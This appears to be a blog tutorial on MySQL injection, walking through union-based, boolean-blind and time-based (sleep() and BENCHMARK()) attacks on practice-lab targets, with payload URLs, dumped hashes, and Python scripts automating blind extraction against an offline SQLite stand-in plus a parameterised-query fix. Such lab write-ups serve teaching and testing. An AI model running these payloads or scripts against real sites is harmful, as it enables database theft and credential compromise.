Common MySQL injection techniques

Posted by zzh%100


MySQL union-based injection (query output is echoed in the page)

1. Confirm the injection is string-based: http://219.153.49.228:43074/new_list.php?id=tingjigonggao' and 1=1 --+
The page renders normally with and 1=1 and not with and 1=2, so the single quote closes the string literal and everything after it is evaluated as SQL (--+ decodes to "-- ", which comments out the application's trailing quote).
2. Find the column count, here 4: http://219.153.49.228:43074/new_list.php?id=tingjigonggao' order by 4--+
order by n is accepted while n does not exceed the number of selected columns and errors past it.
3. Find which columns are echoed into the page: http://219.153.49.228:43074/new_list.php?id=tingjigonggao' and 1=2 union select 1,2,3,4 --+
and 1=2 empties the legitimate result so only the union row is displayed; the positions whose numbers show up are the ones that can carry expressions.
4. Current database and version: http://219.153.49.228:43074/new_list.php?id=tingjigonggao' and 1=2 union select 1,database(),version(),4 --+
Database: mozhe_discuz_stormgroup
Version: 10.2.15-MariaDB-log
5. Enumerate the other databases: union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit *,1 (* runs from 0 upwards until the page returns nothing)
When the echoed column is wide enough, group_concat(SCHEMA_NAME) returns all of them in one request instead.
Databases:
information_schema
mozhe_discuz_stormgroup
mysql
performance_schema
test
6. Tables in mozhe_discuz_stormgroup: union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='<database name to query>' limit *,1 (* runs from 0 upwards until the page returns nothing)
notice
stormgroup_member
7. Columns of stormgroup_member: union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_discuz_stormgroup' and TABLE_NAME='stormgroup_member' limit *,1 (* runs from 0 upwards until the page returns nothing)
id
name
password
status
8. Dump the rows: union select 1,CONCAT(id,'-',name,'-',password,'-',status),3,4 from mozhe_discuz_stormgroup.stormgroup_member limit *,1 (* runs from 0 upwards until the page returns nothing)
1-mozhe-46e65165c36b3167530b4837a605f086-1
after an MD5 lookup: 1-mozhe-389699-1
2-mozhe-356f589a7df439f6f744ff19bb8092c0-0
after an MD5 lookup: 2-mozhe-dsan13-0
Note: status 0 means the account is disabled. MD5 is a hash, not encryption: the plaintexts come from looking the digests up in a precomputed table, which only succeeds for weak passwords like these two.
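The eight steps above as a runnable walk-through, written for this page rather than taken from it. An in-memory SQLite database stands in for the MariaDB target (sqlite3 ships with Python, so it runs offline); the table names and the two hashes are the ones printed above, while the notice table layout and the vulnerable_lookup()/safe_lookup() functions are assumptions about what new_list.php does. The mechanics (quote-out, ORDER BY probing, UNION into the echoed column) are the same on MySQL; only the string concatenation syntax differs, as noted in the code.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the lab: SQLite in memory instead of MariaDB, with the
    table layout recovered on the page and the two hashes it printed as sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE notice(id INTEGER, title TEXT, body TEXT, posted TEXT);
        INSERT INTO notice VALUES (1, 'tingjigonggao', 'maintenance tonight', '2020-01-01');
        CREATE TABLE stormgroup_member(id INTEGER, name TEXT, password TEXT, status INTEGER);
        INSERT INTO stormgroup_member VALUES
            (1, 'mozhe', '46e65165c36b3167530b4837a605f086', 1),
            (2, 'mozhe', '356f589a7df439f6f744ff19bb8092c0', 0);
    """)
    return db


def vulnerable_lookup(db, notice_id):
    """What new_list.php must be doing (assumed): the id parameter is pasted into the SQL text."""
    sql = "SELECT id, title, body, posted FROM notice WHERE title = '%s'" % notice_id
    return db.execute(sql).fetchall()


def safe_lookup(db, notice_id):
    """The fix: a bound parameter travels as data, so it can never change the query's shape."""
    sql = "SELECT id, title, body, posted FROM notice WHERE title = ?"
    return db.execute(sql, (notice_id,)).fetchall()


def find_column_count(lookup, db, base, max_columns=10):
    """Step 2 of the page: ORDER BY n is accepted up to the real column count and
    raises past it. Returns None when no value ever errors (nothing is injectable)."""
    for n in range(1, max_columns + 1):
        try:
            lookup(db, "%s' order by %d-- " % (base, n))
        except sqlite3.OperationalError:
            return n - 1
    return None


def dump_members(lookup, db):
    """Steps 3 and 8 of the page in one request: 'and 1=2' empties the legitimate result,
    UNION appends attacker-chosen rows, and the echoed second column carries the data.
    SQLite concatenates with ||; on MySQL this is CONCAT(id,'-',name,'-',password,'-',status)."""
    payload = ("tingjigonggao' and 1=2 union select 1, id||'-'||name||'-'||password||'-'||status, 3, 4 "
               "from stormgroup_member-- ")
    return sorted(row[1] for row in lookup(db, payload))


if __name__ == "__main__":
    db = make_db()
    print("columns:", find_column_count(vulnerable_lookup, db, "tingjigonggao"))
    print("vulnerable:", dump_members(vulnerable_lookup, db))
    print("parameterised:", dump_members(safe_lookup, db))
```

Against safe_lookup() the same payload is matched literally as a title: no error from any ORDER BY value, no rows from the UNION. That is the whole difference between the two functions, and it is the check to apply to any query that builds SQL from request parameters.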

MySQL boolean-based blind injection

1. Length of the database name: http://219.153.49.228:42875/new_list.php?id=1 and length(database())=10 --+
2. Recover the database name one character at a time (the page renders normally only when the comparison holds; 115 is the ASCII code of s):
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),1,1))=115 --+  s  
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),2,1))=116 --+  t
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),3,1))=111--+   o
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),4,1))=114--+   r
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),5,1))=109--+   m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),6,1))=103--+   g
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),7,1))=114--+   r
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),8,1))=111--+   o
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),9,1))=117--+   u
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),10,1))=112--+  p
Database name: stormgroup

3. Recover the table names:
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),1,1))=109 --+   m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),2,1))=101 --+   e
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),3,1))=109 --+   m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),4,1))=98 --+    b
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),5,1))=101 --+   e
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),6,1))=114 --+   r
Table 1: member

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),1,1))=110 --+   n
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),2,1))=111 --+   o
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),3,1))=116 --+   t
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),4,1))=105 --+   i
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),5,1))=99 --+    c
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),6,1))=101 --+   e
Table 2: notice

4. Recover the column names:
http://219.153.49.228:42875/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1))=4 --+   length 4

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),1,1))=110 --+   n
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),2,1))=97 --+    a
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),3,1))=109 --+   m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),4,1))=101 --+   e
Column 1: name

http://219.153.49.228:42875/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 1,1))=8 --+

Column 2: length 8, presumably password

Column 3:
http://219.153.49.228:42875/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 2,1))=6 --+   length 6, presumably status (1 = account enabled, 0 = disabled)
Guessing a name from its length saves requests, but a wrong guess makes every later query on that column error out, which in a boolean-blind setting just reads as "false" for every probe. Confirm at least the first character before building on the guess.

5. Recover the column contents:
status first:
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(status) from stormgroup.member limit 0,1))=1 --+   length 1
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(status) from stormgroup.member limit 0,1),1,1))=48 --+   0
Account status 0: disabled

http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(status) from stormgroup.member limit 1,1))=1 --+   length 1
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(status) from stormgroup.member limit 1,1),1,1))=49 --+   1
Account status 1: enabled

name column
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(name) from stormgroup.member limit 1,1))=5 --+   length 5
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),1,1))=109 --+   m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),2,1))=111 --+   o
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),3,1))=122 --+   z
... and so on; the username is mozhe

password column
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(password) from stormgroup.member limit 1,1))=32 --+   length 32. Far too many requests to do by hand at one comparison per request; hand it to sqlmap and pull the 32-character MD5 that way.
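The character-by-character probing above works, but at one equality test per request it costs up to 95 requests per character, which is why the 32-character hash was handed to sqlmap. The script below, added here as an example and not part of the original write-up, turns the same length(...) and ascii(substr(...)) probes into a binary search (about 7 requests per character) and counts the requests so the cost is visible. An in-memory SQLite database with database() and ascii() registered as user functions stands in for the lab target, so the payloads stay in MySQL syntax and run offline; the notice table, the member rows and the Oracle class are assumptions about the lab, with the rows ordered as this section recovered them (first row disabled, second row mozhe).

```python
import sqlite3


def make_db():
    """Constructed stand-in for the lab: SQLite in memory. database() and ascii() are
    not SQLite built-ins, so they are registered here to keep the payloads in MySQL syntax."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE notice(id INTEGER, title TEXT);
        INSERT INTO notice VALUES (1, 'tingjigonggao');
        CREATE TABLE member(name TEXT, password TEXT, status INTEGER);
        INSERT INTO member VALUES
            ('mozhe', '46e65165c36b3167530b4837a605f086', 0),
            ('mozhe', '356f589a7df439f6f744ff19bb8092c0', 1);
    """)
    db.create_function("database", 0, lambda: "stormgroup")
    db.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    return db


def vulnerable_page(db, id_param):
    """new_list.php?id=... as assumed: a numeric parameter concatenated unquoted into the query."""
    return db.execute("SELECT title FROM notice WHERE id = " + id_param).fetchall()


class Oracle:
    """One boolean question per call: does the page still show the notice when
    'id=1 and <condition> -- ' is sent? Counts requests so the cost is visible."""

    def __init__(self, db):
        self.db = db
        self.requests = 0

    def __call__(self, condition):
        self.requests += 1
        return len(vulnerable_page(self.db, "1 and %s -- " % condition)) > 0


def binary_search(ask, lo, hi, greater_than):
    """Smallest v in [lo, hi] for which 'value > v' is false, i.e. the value itself.
    greater_than(v) renders the SQL condition 'value > v' for the oracle."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(greater_than(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(ask, expr, max_len=64):
    """Recover the string produced by a MySQL expression such as database() or
    'select name from member limit 1,1': length first, then each character over
    the printable ASCII range 32..126."""
    length = binary_search(ask, 0, max_len, lambda v: "length((%s))>%d" % (expr, v))
    chars = []
    for pos in range(1, length + 1):
        code = binary_search(ask, 32, 126,
                             lambda v, pos=pos: "ascii(substr((%s),%d,1))>%d" % (expr, pos, v))
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    ask = Oracle(make_db())
    for expr in ("database()",
                 "select name from member limit 1,1",
                 "select password from member limit 1,1"):
        print(expr, "->", extract(ask, expr))
    print("requests:", ask.requests)
```

On a real target the Oracle body becomes an HTTP request plus the "does the page contain the notice" check, and everything else stays the same. The 32-character password costs at most 7 + 32 * 7 requests this way, against up to 95 * 32 with the equality probes above.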


MySQL time-based injection

Confirming that an injection point exists

http://10.0.0.21/yanci.php?username=root' and sleep(5)%23   (%23 is the URL encoding of #, which comments out the rest of the query)

or

http://10.0.0.21/yanci.php?username=root' and sleep(5) and 'xRsl'='xRsl#

A response that takes about 5 seconds longer than normal means the injected expression was evaluated.

Using sleep() to test the first character of the current database name

http://10.0.0.21/yanci.php?username=root' and If(ascii(substr(database(),1,1))=114,1,sleep(5))#

Note the branch order here: the response is immediate when the first character is r (114) and delayed by 5 seconds otherwise, so the fast response is the "yes". The payloads below put sleep() in the true branch instead; either works as long as the reading is applied consistently.

Replace database() with another expression to retrieve other information, for example:

1. Length of the database version

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1' and if(length((version()))=6,sleep(10),1)--+

2. First character of the database version

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1' and if(ascii(substr(version(),1,1))=53,sleep(10),1)--+

3. Length of the first database name

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1' and if(length((select schema_name from information_schema.schemata limit 0,1))=18,sleep(10),1)--+

4. First character of the first database name

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(10),1)--+

Changing the offset after limit selects which database is tested: the first database is index 0, the next is 1, and so on.

5. Length of the fourth table in the security database

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1' and if(length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5,sleep(10),1)--+

6. First character of the fourth table in the security database

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(10),1)--+

7. Length of the second column of the users table in the security database

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1' and if(length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1))=8,sleep(10),1)--+

8. First character of the second column of the users table in the security database

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,1))=117,sleep(10),1)--+

9. Length of the first row's value in the second column of the users table in the security database
http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1' and if(length((select username from security.users limit 0,1))=4,sleep(10),1)--+

Time-based injection with BENCHMARK()

BENCHMARK(count,expr) evaluates expr count times; it exists to measure how fast MySQL evaluates an expression, and its return value is always 0. Ten million rounds of md5() take several seconds on most servers, which makes it a substitute for sleep() where sleep() is unavailable or filtered. The delay depends on the server's CPU and current load, so measure the normal response time and the loaded response time before reading any results from it.

1. Confirm the injection point

http://127.0.0.1:4609/?id=1 and if(1=0,1, sleep(10)) --+

(1=0 is false, so the else branch runs: a 10 second delay shows the injected expression is being evaluated.)

2. Is the first character of the database version 5?

http://127.0.0.1:4610/?id=1 and if(left(version(),1)=5,(select benchmark(10000000,md5(0x41))),1) --+

3. Is the connecting user's name 18 characters long?

http://127.0.0.1:4610/?id=1 and if(length(user())=18,(select benchmark(10000000,md5(0x41))),1) --+

4. Are the first 18 characters of the user name sql_user@localhost?

http://127.0.0.1:4610/?id=1 and if(left(user(),18)='sql_user@localhost',(select benchmark(10000000,md5(0x41))),1) --+

5. Is the database name 6 characters long?

http://127.0.0.1:4610/?id=1 and if(length(database())=6,(select benchmark(10000000,md5(0x41))),1) --+

6. Is the first character of the database name s?

http://127.0.0.1:4610/?id=1 and if(ascii(substring((database()),1,1))=115,(select benchmark(10000000,md5(0x41))),1) --+

And so on for the remaining characters.

 --------------------------------------------------

7. Is the table name 4 characters long?

http://127.0.0.1:4610/?id=1 and if(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=4,(select benchmark(10000000,md5(0x41))),1) --+

8. Is the first character of the table name f?

http://127.0.0.1:4610/?id=1 and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='f',(select benchmark(10000000,md5(0x41))),1) --+

And so on for the remaining characters.

  --------------------------------------------------

9. Is the column name 4 characters long?

http://127.0.0.1:4610/?id=1 and if(length((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x666c6167 limit 1,1))=4,(select benchmark(10000000,md5(0x41))),1) --+

(0x666c6167 is the hex encoding of the string flag; writing the table name this way avoids quote characters that a filter might reject or that would otherwise need escaping.)

10. Is the first character of the column name f?

http://127.0.0.1:4610/?id=1 and if(left((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x666c6167 limit 1,1),1)='f',(select benchmark(10000000,md5(0x41))),1) --+

And so on for the remaining characters.

 --------------------------------------------------

11. Is the value in the column 14 characters long?

http://127.0.0.1:4610/?id=1 and if(length((select flag from flag limit 0,1))=14,(select benchmark(10000000,md5(0x41))),1) --+

12. Is the first character of the value w?

http://127.0.0.1:4610/?id=1 and if(left((select flag from flag limit 0,1),1)='w',(select benchmark(10000000,md5(0x41))),1) --+

or

http://127.0.0.1:4610/?id=1 and if(ascii(substring((SELECT flag FROM flag),1,1))=119,(select benchmark(10000000,md5(0x41))),1) --+

(The second form omits limit 0,1 and only works while the flag table holds a single row: a scalar subquery that returns more than one row is an error, and the error looks exactly like a "false" answer.)
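The sleep() section and the BENCHMARK() section above both read one bit per request out of the response time, and the weak point of doing that by eye is jitter: a single slow response looks like a true condition. The script below, added here as an example and not part of the original page, measures a baseline, sets the threshold halfway to the expected delay and takes a majority vote over three samples per question. SQLite with sleep(), version() and ascii() registered as user functions stands in for the Less-5 target; the users row and the 5.7.26 version string are constructed so that the length and first-character checks on the page come out true. CASE WHEN replaces MySQL's if() because SQLite has no if(); on a real target substitute the page's if(cond,sleep(n),1), or the benchmark() expression where sleep() is filtered, and calibrate again, since benchmark() time depends on the server's CPU.

```python
import sqlite3
import statistics
import time

DELAY = 0.2    # seconds the injected sleep() adds when the condition holds
SAMPLES = 3    # odd; the majority vote absorbs one unlucky slow response


def make_db():
    """Constructed stand-in for the Less-5 target: SQLite in memory with MySQL's sleep(),
    version() and ascii() registered as user functions. The version string and the users
    row are chosen to satisfy the checks on the page (length 6, first character '5';
    username of length 4)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(id INTEGER, username TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'Dumb')")
    db.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    db.create_function("version", 0, lambda: "5.7.26")
    db.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    return db


def vulnerable_page(db, id_param):
    """Less-5 shape (assumed): id is pasted into a quoted literal and nothing from the row is echoed."""
    db.execute("SELECT id FROM users WHERE id='%s' LIMIT 0,1" % id_param).fetchall()


def timed_request(db, id_param):
    """Round-trip time of one request; on a real target this wraps the HTTP call."""
    start = time.perf_counter()
    vulnerable_page(db, id_param)
    return time.perf_counter() - start


def calibrate(db, samples=SAMPLES):
    """Median round trip of a benign request; the threshold sits halfway to DELAY so that
    jitter on either side of the baseline is tolerated."""
    baseline = statistics.median(timed_request(db, "1") for _ in range(samples))
    return baseline + DELAY / 2


def ask(db, condition, threshold):
    """One yes/no question. CASE WHEN is the portable spelling of MySQL's
    if(cond, sleep(n), 1); only the true branch pays the delay. True iff the
    majority of SAMPLES requests came back slower than the threshold."""
    payload = "1' and (case when (%s) then sleep(%s) else 0 end)-- " % (condition, DELAY)
    slow = sum(timed_request(db, payload) > threshold for _ in range(SAMPLES))
    return slow > SAMPLES // 2


if __name__ == "__main__":
    db = make_db()
    threshold = calibrate(db)
    for cond in ("length(version())=6",
                 "length(version())=7",
                 "ascii(substr(version(),1,1))=53",
                 "length((select username from users limit 0,1))=4"):
        print(cond, "->", ask(db, cond, threshold))
```

Three samples at 0.2 s cost 0.6 s per true answer; with the page's 10 s sleep() the same vote would take 30 s per bit, which is why a delay of a few seconds, just clear of the observed jitter, is the practical choice. The bit-per-request loop from the boolean section above plugs in unchanged once ask() is the oracle.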
